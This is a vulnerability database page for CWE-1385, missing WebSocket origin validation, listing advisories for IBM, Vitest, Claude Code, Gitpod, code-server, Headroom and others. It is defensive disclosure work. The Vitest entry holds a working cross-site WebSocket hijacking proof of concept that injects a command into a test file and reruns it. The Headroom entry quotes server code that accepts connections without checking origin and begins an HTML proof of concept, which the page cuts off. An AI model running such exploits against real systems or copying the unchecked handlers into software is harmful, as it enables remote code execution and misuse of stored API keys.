Common Weakness Enumeration

CWE-1385

Allowed

Missing Origin Validation in WebSockets

Abstraction: Variant · Status: Incomplete

The product uses a WebSocket, but it does not properly verify that the source of data or communication is valid.

74 vulnerabilities reference this CWE, most recent first.

GHSA-7W4F-RR94-7CWP

Vulnerability from github – Published: 2025-07-23 15:31 – Updated: 2025-07-23 15:31
VLAI
Details

IBM Db2 Mirror for i 7.4, 7.5, and 7.6 GUI is affected by cross-site WebSocket hijacking vulnerability. By sending a specially crafted request, an unauthenticated malicious actor could exploit this vulnerability to sniff an existing WebSocket connection to then remotely perform operations that the user is not allowed to perform.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-36116"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-07-23T15:15:31Z",
    "severity": "MODERATE"
  },
  "details": "IBM Db2 Mirror for i 7.4, 7.5, and 7.6 GUI is affected by cross-site WebSocket hijacking vulnerability.  By sending a specially crafted request, an unauthenticated malicious actor could exploit this vulnerability to sniff an existing WebSocket connection to then remotely perform operations that the user is not allowed to perform.",
  "id": "GHSA-7w4f-rr94-7cwp",
  "modified": "2025-07-23T15:31:14Z",
  "published": "2025-07-23T15:31:13Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-36116"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7240351"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-8JV6-9X2J-W49P

Vulnerability from github – Published: 2024-08-15 21:31 – Updated: 2024-08-16 00:32
VLAI
Details

Vulnerability in Xiexe XSOverlay before build 647 allows non-local websites to send the malicious commands to the WebSocket API, resulting in the arbitrary code execution.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-23168"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-08-15T19:15:18Z",
    "severity": "CRITICAL"
  },
  "details": "Vulnerability in Xiexe XSOverlay before build 647 allows non-local websites to send the malicious commands to the WebSocket API, resulting in the arbitrary code execution.",
  "id": "GHSA-8jv6-9x2j-w49p",
  "modified": "2024-08-16T00:32:04Z",
  "published": "2024-08-15T21:31:19Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23168"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Xiexe/XSOverlay-Issue-Tracker"
    },
    {
      "type": "WEB",
      "url": "https://store.steampowered.com/news/app/1173510?emclan=103582791465938574\u0026emgid=7792991106417394332"
    },
    {
      "type": "WEB",
      "url": "https://vuln.ryotak.net/advisories/70"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-9CRC-Q9X8-HGQQ

Vulnerability from github – Published: 2025-02-04 17:00 – Updated: 2025-02-04 22:04
VLAI
Summary
Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening
Details

Summary

Arbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.

Details

When api option is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks. https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46

This WebSocket server has saveTestFile API that can edit a test file and rerun API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the saveTestFile API and then running that file by calling the rerun API. https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76

PoC

  1. Open Vitest UI.
  2. Access a malicious web site with the script below.
  3. If you have calc executable in PATH env var (you'll likely have it if you are running on Windows), that application will be executed.
// code from https://github.com/WebReflection/flatted
const Flatted=function(n){"use strict";function t(n){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n&&"function"==typeof Symbol&&n.constructor===Symbol&&n!==Symbol.prototype?"symbol":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f="string",i={},c="object",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p<y;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i&&(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g<m;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c&&u?y(o,new Set,u,f):u;return f.call({"":i},"",i)},S=function(n,r,o){for(var u=r&&t(r)===c?function(n,t){return""===n||-1<r.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({"":n},"",n)),v=!y;y<l.length;)v=!0,s[y]=e(l[y++],S,o);return"["+s.join(",")+"]";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});

// actual code to run
const ws = new WebSocket('ws://localhost:51204/__vitest_api__')
ws.addEventListener('message', e => {
    console.log(e.data)
})
ws.addEventListener('open', () => {
    ws.send(Flatted.stringify({ t: 'q', i: crypto.randomUUID(), m: "getFiles", a: [] }))

    const testFilePath = "/path/to/test-file/basic.test.ts" // use a test file returned from the response of "getFiles"

    // edit file content to inject command execution
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "saveTestFile",
      a: [testFilePath, "import child_process from 'child_process';child_process.execSync('calc')"]
    }))
    // rerun the tests to run the injected command execution code
    ws.send(Flatted.stringify({
      t: 'q',
      i: crypto.randomUUID(),
      m: "rerun",
      a: [testFilePath]
    }))
})

Impact

This vulnerability can result in remote code execution for users that are using Vitest serve API.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "vitest"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.6.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "vitest"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.1.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "vitest"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "vitest"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.0.125"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-24964"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-02-04T17:00:57Z",
    "nvd_published_at": "2025-02-04T20:15:50Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\nArbitrary remote Code Execution when accessing a malicious website while Vitest API server is listening by Cross-site WebSocket hijacking (CSWSH) attacks.\n\n### Details\nWhen [`api` option](https://vitest.dev/config/#api) is enabled (Vitest UI enables it), Vitest starts a WebSocket server. This WebSocket server did not check Origin header and did not have any authorization mechanism and was vulnerable to CSWSH attacks.\nhttps://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46\n\nThis WebSocket server has `saveTestFile` API that can edit a test file and `rerun` API that can rerun the tests. An attacker can execute arbitrary code by injecting a code in a test file by the `saveTestFile` API and then running that file by calling the `rerun` API.\nhttps://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76\n\n### PoC\n1. Open Vitest UI.\n2. Access a malicious web site with the script below.\n3. If you have `calc` executable in `PATH` env var (you\u0027ll likely have it if you are running on Windows), that application will be executed.\n\n```js\n// code from https://github.com/WebReflection/flatted\nconst Flatted=function(n){\"use strict\";function t(n){return t=\"function\"==typeof Symbol\u0026\u0026\"symbol\"==typeof Symbol.iterator?function(n){return typeof n}:function(n){return n\u0026\u0026\"function\"==typeof Symbol\u0026\u0026n.constructor===Symbol\u0026\u0026n!==Symbol.prototype?\"symbol\":typeof n},t(n)}var r=JSON.parse,e=JSON.stringify,o=Object.keys,u=String,f=\"string\",i={},c=\"object\",a=function(n,t){return t},l=function(n){return n instanceof u?u(n):n},s=function(n,r){return t(r)===f?new u(r):r},y=function n(r,e,f,a){for(var l=[],s=o(f),y=s.length,p=0;p\u003cy;p++){var v=s[p],S=f[v];if(S instanceof u){var b=r[S];t(b)!==c||e.has(b)?f[v]=a.call(f,v,b):(e.add(b),f[v]=i,l.push({k:v,a:[r,e,b,a]}))}else f[v]!==i\u0026\u0026(f[v]=a.call(f,v,S))}for(var m=l.length,g=0;g\u003cm;g++){var h=l[g],O=h.k,d=h.a;f[O]=a.call(f,O,n.apply(null,d))}return f},p=function(n,t,r){var e=u(t.push(r)-1);return n.set(r,e),e},v=function(n,e){var o=r(n,s).map(l),u=o[0],f=e||a,i=t(u)===c\u0026\u0026u?y(o,new Set,u,f):u;return f.call({\"\":i},\"\",i)},S=function(n,r,o){for(var u=r\u0026\u0026t(r)===c?function(n,t){return\"\"===n||-1\u003cr.indexOf(n)?t:void 0}:r||a,i=new Map,l=[],s=[],y=+p(i,l,u.call({\"\":n},\"\",n)),v=!y;y\u003cl.length;)v=!0,s[y]=e(l[y++],S,o);return\"[\"+s.join(\",\")+\"]\";function S(n,r){if(v)return v=!v,r;var e=u.call(this,n,r);switch(t(e)){case c:if(null===e)return e;case f:return i.get(e)||p(i,l,e)}return e}};return n.fromJSON=function(n){return v(e(n))},n.parse=v,n.stringify=S,n.toJSON=function(n){return r(S(n))},n}({});\n\n// actual code to run\nconst ws = new WebSocket(\u0027ws://localhost:51204/__vitest_api__\u0027)\nws.addEventListener(\u0027message\u0027, e =\u003e {\n    console.log(e.data)\n})\nws.addEventListener(\u0027open\u0027, () =\u003e {\n    ws.send(Flatted.stringify({ t: \u0027q\u0027, i: crypto.randomUUID(), m: \"getFiles\", a: [] }))\n\n    const testFilePath = \"/path/to/test-file/basic.test.ts\" // use a test file returned from the response of \"getFiles\"\n\n    // edit file content to inject command execution\n    ws.send(Flatted.stringify({\n      t: \u0027q\u0027,\n      i: crypto.randomUUID(),\n      m: \"saveTestFile\",\n      a: [testFilePath, \"import child_process from \u0027child_process\u0027;child_process.execSync(\u0027calc\u0027)\"]\n    }))\n    // rerun the tests to run the injected command execution code\n    ws.send(Flatted.stringify({\n      t: \u0027q\u0027,\n      i: crypto.randomUUID(),\n      m: \"rerun\",\n      a: [testFilePath]\n    }))\n})\n```\n\n### Impact\nThis vulnerability can result in remote code execution for users that are using Vitest serve API.",
  "id": "GHSA-9crc-q9x8-hgqq",
  "modified": "2025-02-04T22:04:09Z",
  "published": "2025-02-04T17:00:57Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vitest-dev/vitest/security/advisories/GHSA-9crc-q9x8-hgqq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-24964"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitest-dev/vitest/commit/191ef9e34c867d0efd04f49b3d38193a68e825dc"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitest-dev/vitest/commit/7ce9fbb4972d45c6fd34c843645ef6f549bbb241"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitest-dev/vitest/commit/e0fe1d81e2d4bcddb1c6ca3c5c3970d8ba697383"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vitest-dev/vitest"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L32-L46"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vitest-dev/vitest/blob/9a581e1c43e5c02b11e2a8026a55ce6a8cb35114/packages/vitest/src/api/setup.ts#L66-L76"
    },
    {
      "type": "WEB",
      "url": "https://vitest.dev/config/#api"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vitest allows Remote Code Execution when accessing a malicious website while Vitest API server is listening"
}

GHSA-9F65-56V6-GXW7

Vulnerability from github – Published: 2025-06-23 21:22 – Updated: 2025-06-27 23:07
VLAI
Summary
Claude Code Improper Authorization via websocket connections from arbitrary origins
Details

Claude Code extensions in VSCode and forks (e.g., Cursor, Windsurf, and VSCodium) and JetBrains IDEs (e.g., IntelliJ, Pycharm, and Android Studio) are vulnerable to unauthorized websocket connections from an attacker when visiting attacker-controlled webpages. Claude Code for VSCode IDE extensions versions 0.2.116 through 1.0.23 are vulnerable. For Jetbrains IDE plugins, Claude Code [beta] versions 0.1.1 through 0.1.8 are vulnerable.

In VSCode (and forks), exploitation would allow an attacker to read arbitrary files, see the list of files open in the IDE, get selection and diagnostics events from the IDE, or execute code in limited situations where a user has an open Jupyter Notebook and accepts a malicious prompt. In JetBrains IDEs, an attacker could get selection events, a list of open files, and a list of syntax errors.

Remediation

We released a patch for this issue on June 13th, 2025. Although Claude Code auto-updates when you launch it and auto-updates the extensions, you should take the following steps (the exact steps depend on your IDE).

VSCode, Cursor, Windsurf, VSCodium, and other VSCode forks Extension Name: Claude Code for VSCode

Instructions:

  1. Open the list of Extensions (View->Extensions)
  2. Look for Claude Code for VSCode among installed extensions
  3. If you have a version < 1.0.24, click “Update” (or “Uninstall”)
  4. Restart the IDE

All JetBrains IDEs including IntelliJ, PyCharm, and Android Studio Plugin name: Claude Code [Beta]

Instructions:

  1. Open the Plugins list
  2. Look for Claude Code [Beta] among installed extensions
  3. Update (or Uninstall) the plugin if the version is < 0.1.9
  4. Restart the IDE
Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@anthropic-ai/claude-code"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.2.116"
            },
            {
              "fixed": "1.0.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-52882"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385",
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-06-23T21:22:22Z",
    "nvd_published_at": "2025-06-24T20:15:26Z",
    "severity": "HIGH"
  },
  "details": "Claude Code extensions in VSCode and forks (e.g., Cursor, Windsurf, and VSCodium) and JetBrains IDEs (e.g., IntelliJ, Pycharm, and Android Studio) are vulnerable to unauthorized websocket connections from an attacker when visiting attacker-controlled webpages. Claude Code for VSCode IDE extensions versions 0.2.116 through 1.0.23 are vulnerable. For Jetbrains IDE plugins, Claude Code [beta] versions 0.1.1 through 0.1.8 are vulnerable.  \n\nIn VSCode (and forks), exploitation would allow an attacker to read arbitrary files, see the list of files open in the IDE, get selection and diagnostics events from the IDE, or execute code in limited situations where a user has an open Jupyter Notebook and accepts a malicious prompt. In JetBrains IDEs, an attacker could get selection events, a list of open files, and a list of syntax errors.\n\n**Remediation**\n\nWe released a patch for this issue on June 13th, 2025. Although Claude Code auto-updates when you launch it and auto-updates the extensions, you should take the following steps (the exact steps depend on your IDE).\n\n**VSCode, Cursor, Windsurf, VSCodium, and other VSCode forks**\nExtension Name: Claude Code for VSCode\n\nInstructions:\n\n1. Open the list of Extensions (View-\u003eExtensions)\n2. Look for Claude Code for VSCode among installed extensions\n3. If you have a version \u003c 1.0.24, click \u201cUpdate\u201d (or \u201cUninstall\u201d)\n4. Restart the IDE \n\n**All JetBrains IDEs including IntelliJ, PyCharm, and Android Studio**\nPlugin name: Claude Code [Beta]\n\nInstructions:\n\n1. Open the Plugins list\n2. Look for Claude Code [Beta] among installed extensions\n3. Update (or Uninstall) the plugin if the version is \u003c 0.1.9\n4. Restart the IDE",
  "id": "GHSA-9f65-56v6-gxw7",
  "modified": "2025-06-27T23:07:59Z",
  "published": "2025-06-23T21:22:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/anthropics/claude-code/security/advisories/GHSA-9f65-56v6-gxw7"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52882"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/anthropics/claude-code"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Claude Code Improper Authorization via websocket connections from arbitrary origins"
}

GHSA-C398-4R23-X3C7

Vulnerability from github – Published: 2025-05-16 09:30 – Updated: 2025-05-16 09:30
VLAI
Details

Cross-Site WebSocket Hijacking vulnerability in Hitachi Ops Center Analyzer (RAID Agent component).This issue affects Hitachi Ops Center Analyzer: from 10.8.0-00 before 11.0.4-00; Hitachi Ops Center Analyzer: from 10.9.0-00 before 11.0.4-00.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-8201"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-16T07:15:46Z",
    "severity": "MODERATE"
  },
  "details": "Cross-Site WebSocket Hijacking\u00a0vulnerability in Hitachi Ops Center Analyzer (RAID Agent component).This issue affects Hitachi Ops Center Analyzer: from 10.8.0-00 before 11.0.4-00; Hitachi Ops Center Analyzer: from 10.9.0-00 before 11.0.4-00.",
  "id": "GHSA-c398-4r23-x3c7",
  "modified": "2025-05-16T09:30:36Z",
  "published": "2025-05-16T09:30:36Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8201"
    },
    {
      "type": "WEB",
      "url": "https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2025-116/index.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-C6MC-4W4V-Q86X

Vulnerability from github – Published: 2026-09-14 21:31 – Updated: 2026-09-14 21:31
VLAI
Details

IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to obtain sensitive information due to improper validation of the WebSocket origin.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-18251"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-09-14T20:16:42Z",
    "severity": "MODERATE"
  },
  "details": "IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote attacker to obtain sensitive information due to improper validation of the WebSocket origin.",
  "id": "GHSA-c6mc-4w4v-q86x",
  "modified": "2026-09-14T21:31:44Z",
  "published": "2026-09-14T21:31:44Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-18251"
    },
    {
      "type": "WEB",
      "url": "https://www.ibm.com/support/pages/node/7286974"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-CMH9-2WR3-4X64

Vulnerability from github – Published: 2026-10-06 03:31 – Updated: 2026-10-06 15:31
VLAI
Details

Punk versions from 0.48 before 0.55 for Perl route Extended CONNECT requests to any GET route without an Origin check in ps_serve_one.

On HTTP/2 and HTTP/3 a WebSocket handshake arrives as an Extended CONNECT, which is matched as a GET and so reaches every GET route, API operation and mount. The Origin check runs only when a websocket route matches. On this transport the handler's status is the handshake response, and a 2xx accepts it.

A cross-origin page can open a WebSocket to any path and learn from its open or error event whether that path returns 2xx.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-104380"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-10-06T02:17:03Z",
    "severity": "MODERATE"
  },
  "details": "Punk versions from 0.48 before 0.55 for Perl route Extended CONNECT requests to any GET route without an Origin check in ps_serve_one.\n\nOn HTTP/2 and HTTP/3 a WebSocket handshake arrives as an Extended CONNECT, which is matched as a GET and so reaches every GET route, API operation and mount. The Origin check runs only when a websocket route matches. On this transport the handler\u0027s status is the handshake response, and a 2xx accepts it.\n\nA cross-origin page can open a WebSocket to any path and learn from its open or error event whether that path returns 2xx.",
  "id": "GHSA-cmh9-2wr3-4x64",
  "modified": "2026-10-06T15:31:49Z",
  "published": "2026-10-06T03:31:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-104380"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/LNATION/Punk-0.55/changes"
    },
    {
      "type": "WEB",
      "url": "https://metacpan.org/release/LNATION/Punk-0.55/diff/LNATION/Punk-0.54"
    },
    {
      "type": "WEB",
      "url": "http://www.openwall.com/lists/oss-security/2026/10/06/1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-F53G-FRR2-JHPF

Vulnerability from github – Published: 2023-07-06 19:24 – Updated: 2024-04-04 05:33
VLAI
Details

An issue was discovered in Gitpod versions prior to release-2022.11.2.16. There is a Cross-Site WebSocket Hijacking (CSWSH) vulnerability that allows attackers to make WebSocket connections to the Gitpod JSONRPC server using a victim’s credentials, because the Origin header is not restricted. This can lead to the extraction of data from workspaces, to a full takeover of the workspace.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-0957"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385",
      "CWE-346"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-03-03T08:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "An issue was discovered in Gitpod versions prior to release-2022.11.2.16. There is a Cross-Site WebSocket Hijacking (CSWSH) vulnerability that allows attackers to make WebSocket connections to the Gitpod JSONRPC server using a victim\u2019s credentials, because the Origin header is not restricted. This can lead to the extraction of data from workspaces, to a full takeover of the workspace.",
  "id": "GHSA-f53g-frr2-jhpf",
  "modified": "2024-04-04T05:33:50Z",
  "published": "2023-07-06T19:24:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0957"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gitpod-io/gitpod/pull/16378"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gitpod-io/gitpod/pull/16405"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gitpod-io/gitpod/commit/12956988eec0031f42ffdfa3bdc3359f65628f9f"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gitpod-io/gitpod/commit/673ab6856fa04c13b7b1f2a968e4d090f1d94e4f"
    },
    {
      "type": "WEB",
      "url": "https://app.safebase.io/portal/71ccd717-aa2d-4a1e-942e-c768d37e9e0c/preview?product=default\u0026orgId=71ccd717-aa2d-4a1e-942e-c768d37e9e0c\u0026tcuUid=1d505bda-9a38-4ca5-8724-052e6337f34d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/gitpod-io/gitpod/releases/tag/release-2022.11.2"
    },
    {
      "type": "WEB",
      "url": "https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FRJG-G767-7363

Vulnerability from github – Published: 2023-03-23 06:30 – Updated: 2023-03-27 22:32
VLAI
Summary
code-server vulnerable to Missing Origin Validation in WebSockets
Details

Versions of the package code-server before 4.10.1 are vulnerable to Missing Origin Validation in WebSockets handshakes. Exploiting this vulnerability can allow an adversary in specific scenarios to access data from and connect to the code-server instance.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "code-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-26114"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385",
      "CWE-346"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-03-23T19:58:10Z",
    "nvd_published_at": "2023-03-23T05:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Versions of the package code-server before 4.10.1 are vulnerable to Missing Origin Validation in WebSockets handshakes. Exploiting this vulnerability can allow an adversary in specific scenarios to access data from and connect to the code-server instance.",
  "id": "GHSA-frjg-g767-7363",
  "modified": "2023-03-27T22:32:09Z",
  "published": "2023-03-23T06:30:15Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26114"
    },
    {
      "type": "WEB",
      "url": "https://github.com/coder/code-server/commit/d477972c68fc8c8e8d610aa7287db87ba90e55c7"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/coder/code-server"
    },
    {
      "type": "WEB",
      "url": "https://github.com/coder/code-server/releases/tag/v4.10.1"
    },
    {
      "type": "WEB",
      "url": "https://security.snyk.io/vuln/SNYK-JS-CODESERVER-3368148"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "code-server vulnerable to Missing Origin Validation in WebSockets"
}

GHSA-H46J-26Q3-RGGF

Vulnerability from github – Published: 2026-10-02 23:09 – Updated: 2026-10-02 23:09
VLAI
Summary
Headroom vulnerable to Cross-Site WebSocket Hijacking (CSWSH)
Details

Summary

The Headroom WebSocket server does not validate the Origin header of incoming client WebSocket requests before forwarding the request to the upstream server, allowing malicious WebSocket clients to perform arbitrary LLM requests without authentication. This can be exploited by a malicious WebSocket client executed in a traditional or headless browser such as lightpanda, if the browser has access to the Headroom proxy and the OpenAI API key is stored in the OPENAI_API_KEY environment variable.

Details

The Headroom server defines a WebSocket handler at ws://<headroom_host>:8787/v1/responses in headroom/providers/proxy_routes.py:

    @app.websocket("/v1/responses")
    async def openai_responses_ws(websocket: WebSocket):
        await proxy.handle_openai_responses_ws(websocket)

In the handle_openai_responses_ws() method of the OpenAIHandlerMixin class, the Origin header of the WebSocket client handshake is not checked or verified before calling websocket.accept(), which grants any WebSocket client (including malicious clients) access to the server:

    async def handle_openai_responses_ws(self, websocket: WebSocket) -> None:
        """WebSocket proxy for /v1/responses (Codex gpt-5.4+).

        Newer Codex versions use WebSocket instead of HTTP POST for the
        Responses API.  This handler:
        1. Accepts the client WebSocket
        2. Receives the first message (``response.create`` request)
        3. Opens an upstream WebSocket to OpenAI
        4. Compresses eligible `response.create` text through the Python
           ContentRouter path, then sends the request upstream
        5. Relays all subsequent messages bidirectionally
        """
        ...

        # Accept client connection with the requested subprotocol
        async with stage_timer.measure("accept"):
            if client_subprotocols:
                await websocket.accept(subprotocol=client_subprotocols[0])
            else:
                await websocket.accept()

The malicious WebSocket client does not need to provide authentication headers or API keys as the Authorization header is automatically populated with the OpenAI API key via the OPENAI_API_KEY environment variable, if it has been used to store the API key:

        # Ensure Authorization header is present — fall back to OPENAI_API_KEY env var.
        # Safety net for clients that don't forward auth headers via WebSocket upgrade.
        if "authorization" not in _lower_headers:
            api_key = os.environ.get("OPENAI_API_KEY")
            if api_key:
                upstream_headers["Authorization"] = f"Bearer {api_key}"
                logger.debug(f"[{request_id}] WS: injected Authorization from OPENAI_API_KEY env")
            else:
                logger.warning(
                    f"[{request_id}] WS: no Authorization header from client and "
                    f"OPENAI_API_KEY not set — upstream will likely reject"
                )

Once the client connection is accepted and authenticated malicious WebSocket clients can perform arbitrary LLM requests to the OpenAI API, including arbitrary instructions/input prompts and tools.

PoC

  • Run the Headroom proxy server: OPENAI_API_KEY=MY_KEY headroom proxy --host 0.0.0.0
  • Render the following HTML PoC page in a traditional or headless browser which has access to the Headroom proxy server:
<html>
<body>
    <script>
        let headroomHost = '192.168.0.106';
